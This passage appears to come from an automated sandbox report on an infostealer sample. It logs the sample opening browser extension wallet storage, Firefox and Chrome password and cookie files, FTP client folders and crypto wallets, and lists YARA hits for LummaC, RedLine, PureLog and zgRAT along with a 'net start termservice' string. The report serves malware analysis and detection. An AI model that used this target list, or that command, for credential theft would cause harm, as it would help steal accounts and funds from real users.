                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                    Tries to harvest and steal ftp login credentials
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                    Tries to steal Crypto Currency Wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: random.exeBinary or memory string: WIN_81
                                    Source: random.exeBinary or memory string: WIN_XP
                                    Source: EduGeniusX.com.41.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                    Source: random.exeBinary or memory string: WIN_XPe
                                    Source: random.exeBinary or memory string: WIN_VISTA
                                    Source: random.exeBinary or memory string: WIN_7
                                    Source: random.exeBinary or memory string: WIN_8
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeDirectory queried: C:\Users\user\Documents
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT

                                    Remote Access Functionality

                                    barindex
                                    Yara detected LummaC Stealer
                                    Source: Yara matchFile source: Process Memory Space: V0Bt74c.exe PID: 4860, type: MEMORYSTR
                                    Source: Yara matchFile source: 51.2.V0Bt74c.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 49.2.V0Bt74c.exe.3549550.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 51.2.V0Bt74c.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000033.00000002.3513079723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Yara detected RedLine Stealer
                                    Source: Yara matchFile source: dump.pcap, type: PCAP
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Contains functionality to start a terminal service
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: net start termservice
